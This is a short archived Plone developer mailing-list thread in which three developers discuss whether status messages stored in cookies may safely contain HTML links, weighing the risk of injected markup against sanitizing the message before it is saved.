[Product-Developers] Links in StatusMessages
Richard Mitchell
richard.j.mitchell at gmail.com
Fri Aug 24 08:45:31 UTC 2012
Philip: If one relies on the data being cleaned before it is set in the
cookie, it could be manipulated afterwards, or completely separately to
contain something more dangerous.
On Aug 24, 2012 9:09 AM, "Philip Bauer" <bauer at starzel.de> wrote:
> How about cleaning the message before saving as a coockie?
>
> Would adding something like
> message = portal_transforms.convertTo('text/x-html-safe', self.message,
> mimetype='text/-x-web-intelligent')
> to Products.statusmessages.message.Message.encode be ok?
>
> Philip
>
> Am 23.08.2012 um 18:50 schrieb Matthew Wilkes <matt at matthewwilkes.name>:
>
> >
> >
> > Philip Bauer wrote:
> >> I changed this by customizing the template. Might there be a better
> way? Or might it be a good idea to change this template by default?
> >
> > I would be hesitant to change this by default, as it means that if a
> malicious user can get cookies set for another user they can insert
> arbitrary HTML.
> >
> > Matt
>
> _______________________________________________
> Product-Developers mailing list
> Product-Developers at lists.plone.org
> https://lists.plone.org/mailman/listinfo/plone-product-developers
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://lists.plone.org/pipermail/plone-product-developers/attachments/20120824/53a3eaaa/attachment.html>
More information about the Product-Developers
mailing list